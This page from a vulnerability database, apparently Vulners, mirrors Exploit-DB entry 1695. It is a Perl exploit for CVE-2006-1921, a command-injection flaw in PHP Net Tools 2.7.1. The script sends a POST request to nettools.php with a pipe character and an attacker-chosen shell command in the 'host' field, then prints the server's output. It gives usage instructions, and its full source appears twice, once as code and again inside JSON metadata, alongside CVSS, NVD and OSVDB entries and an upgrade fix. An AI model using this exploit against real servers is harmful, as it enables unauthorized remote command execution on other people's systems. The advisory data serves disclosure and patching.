Search...

PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit

2006-04-18T00:00:00

ID EDB-ID:1695
Type exploitdb
Reporter FOX_MULDER
Modified 2006-04-18T00:00:00

Description

PHP Net Tools <= 2.7.1 Remote Code Execution Exploit. CVE-2006-1921. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
# PHP Net Tools Remote Code Execution Exploit
#
# by FOX_MULDER (fox_mulder@abv.bg)
# Vulnerability found by FOX_MULDER.
#
# "Born to be root !!!"
#----------------------------------+
#PHP Net Tools                     |
#Copyright (C) 2005 Eric Robertson |
#h4rdc0d3@gmail.com                |
#----------------------------------+
#
# Fact:Wbyte counted twice to infinity !!!
#
#
###################################################
	use LWP 5.64;

	my $hostname = $ARGV[0];
	my $dir = $ARGV[1];
	my $command = $ARGV[2];

        if (@ARGV&lt;2) {
	print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n";
	exit();
	}
	
	print "=======================================================\n";
	print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n";
	print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n";
	print "fox_mulder@abv.bg\r\n";
	print "=======================================================\n";

	my $browser = LWP::UserAgent-&gt;new;
	$browser-&gt;agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
	print "\n\n[+]Sending request to server . . .\r\n";
	
	my $url = "http://$hostname$dir/nettools.php";

	
	my $response = $browser-&gt;post( $url,[
		'ping' =&gt; '1',
        	'host' =&gt; "|$command"]);

 	my $code = $response-&gt;status_line;
        print "[+] HTTP RESPONSE $code\n";
        print "\n[+]Injecting command . . .\n";
	$response-&gt;content =~ /blockquote&gt;(.*)&lt;\/blockquote&gt;/s;
	print "$1\n";

# milw0rm.com [2006-04-18]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:1695", "hash": "817de0ffc279a5098630063382cc29eb", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit", "description": "PHP Net Tools <= 2.7.1 Remote Code Execution Exploit. CVE-2006-1921. Webapps exploit for php platform", "published": "2006-04-18T00:00:00", "modified": "2006-04-18T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/1695/", "reporter": "FOX_MULDER", "references": [], "cvelist": ["CVE-2006-1921"], "lastseen": "2016-01-31T14:41:40", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1695/", "sourceData": "#!/usr/bin/perl\n# PHP Net Tools Remote Code Execution Exploit\n#\n# by FOX_MULDER (fox_mulder@abv.bg)\n# Vulnerability found by FOX_MULDER.\n#\n# \"Born to be root !!!\"\n#----------------------------------+\n#PHP Net Tools |\n#Copyright (C) 2005 Eric Robertson |\n#h4rdc0d3@gmail.com |\n#----------------------------------+\n#\n# Fact:Wbyte counted twice to infinity !!!\n#\n#\n###################################################\n\tuse LWP 5.64;\n\n\tmy $hostname = $ARGV[0];\n\tmy $dir = $ARGV[1];\n\tmy $command = $ARGV[2];\n\n if (@ARGV<2) {\n\tprint \"\\nUsage: ntools.pl www.site.com /dir/ \\\"ls \\-la\\\" \\n\";\n\texit();\n\t}\n\t\n\tprint \"=======================================================\\n\";\n\tprint \"0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\\n\";\n\tprint \"PHP Net Tools Command Execution Exploit by FOX_MULDER\\n\";\n\tprint \"fox_mulder@abv.bg\\r\\n\";\n\tprint \"=======================================================\\n\";\n\n\tmy $browser = LWP::UserAgent->new;\n\t$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');\n\tprint \"\\n\\n[+]Sending request to server . . .\\r\\n\";\n\t\n\tmy $url = \"http://$hostname$dir/nettools.php\";\n\n\t\n\tmy $response = $browser->post( $url,[\n\t\t'ping' => '1',\n \t'host' => \"|$command\"]);\n\n \tmy $code = $response->status_line;\n print \"[+] HTTP RESPONSE $code\\n\";\n print \"\\n[+]Injecting command . . .\\n\";\n\t$response->content =~ /blockquote>(.*)<\\/blockquote>/s;\n\tprint \"$1\\n\";\n\n# milw0rm.com [2006-04-18]\n", "osvdbidlist": ["24783"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-10-19T11:12:21", "references": ["https://www.exploit-db.com/exploits/1695", "http://www.securityfocus.com/bid/17601", "https://exchange.xforce.ibmcloud.com/vulnerabilities/25941", "http://www.attrition.org/pipermail/vim/2006-June/000839.html", "http://www.vupen.com/english/advisories/2006/1420"], "description": "nettools.php in PHP Net Tools 2.7.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the host parameter.", "edition": 3, "reporter": "NVD", "published": "2006-04-20T14:06:00", "title": "CVE-2006-1921", "type": "cve", "enchantments": {"score": {"modified": "2017-10-19T11:12:21", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-1921"], "scanner": [], "modified": "2017-10-18T21:29:06", "cpe": ["cpe:/a:php_net_tools:php_net_tools:2.7.1"], "id": "CVE-2006-1921", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1921", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:21", "references": [], "edition": 1, "description": "## Solution Description\nUpgrade to version 2.7.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://www.hotscripts.com/Detailed/47915.html\n[Secunia Advisory ID:19694](https://secuniaresearch.flexerasoftware.com/advisories/19694/)\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000840.html\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000839.html\nGeneric Exploit URL: http://milw0rm.com/exploits/1695\n[CVE-2006-1921](https://vulners.com/cve/CVE-2006-1921)\n", "reporter": "OSVDB", "published": "2006-04-18T08:32:35", "type": "osvdb", "title": "PHP Net Tools nettools.php host Variable Arbitrary Command Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-1921"], "modified": "2006-04-18T08:32:35", "href": "https://vulners.com/osvdb/OSVDB:24783", "id": "OSVDB:24783", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}

PHP Net Tools &lt;= 2.7.1 - Remote Code Execution Exploit

Description

PHP Net Tools <= 2.7.1 Remote Code Execution Exploit. CVE-2006-1921. Webapps exploit for php platform

PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit